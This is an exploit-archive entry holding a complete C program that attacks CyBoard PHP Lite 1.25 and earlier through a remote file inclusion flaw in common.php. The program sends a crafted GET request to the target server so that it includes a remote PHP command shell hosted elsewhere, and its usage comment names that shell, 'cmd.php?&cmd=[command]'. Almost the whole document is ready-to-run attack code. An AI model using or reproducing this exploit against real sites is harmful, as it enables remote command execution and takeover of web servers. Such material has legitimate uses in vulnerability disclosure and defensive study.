CyBoard PHP Lite versions 1.25 and below remote file inclusion exploit.
936f47c9c9c2fc16f3b680f6ce727ead3ade1986f9843d500bce894830be3213
/* CyBoard PHP Lite <= 1.25 (common.php) Remote File Include */
/* Bug found by SpC-x. */
/* */
/* $ gcc -o f_cbl f_cbl-1.25.c */
/* $ ./f_cbl <remote_addr> <remote_path> <cracker_cmd> */
/* 192.168.0.1 /[cyboard_path]/
http://example/cmd.php?&cmd=[command] */
/* */
/* Federico Fazzi <federico@autistici.org> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#define PORT (80)
int main(int argc, char *argv[]) {
int sock;
char *request;
char response[256];
struct sockaddr_in saddr;
struct hostent *saddrhost;
if ( argc < 3 ) {
printf("%s <remote_addr> <remote_path> <cracker_cmd>\n", argv[0]);
exit(-1);
}
request = (char *) malloc(1024);
// copy into the memory the string GET[..]
snprintf(request, 256, "GET
%sinclude/common.php?script_path=%s\r\n", argv[2], argv[3]);
// init the listener
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("Socket");
exit(-1);
}
else {
// init and set all struct types
bzero((char *)&saddr, sizeof(saddr));
saddrhost = gethostbyname(argv[1]);
bcopy(saddrhost->h_addr,&saddr.sin_addr,saddrhost->h_length);
saddr.sin_family = AF_INET;
saddr.sin_port = htons(PORT);
// get connection with the webserv
if (connect(sock, (struct sockaddr*)&saddr, sizeof(saddr)) == -1) {
perror("Socket");
}
// send string to the webserv
send(sock, request, strlen(request)+1, 0);
// get the answer data from webserv
while (recv(sock, response, sizeof(response), 0)) {
puts(response);
}
}
free(request);
close(sock);
return 0;
}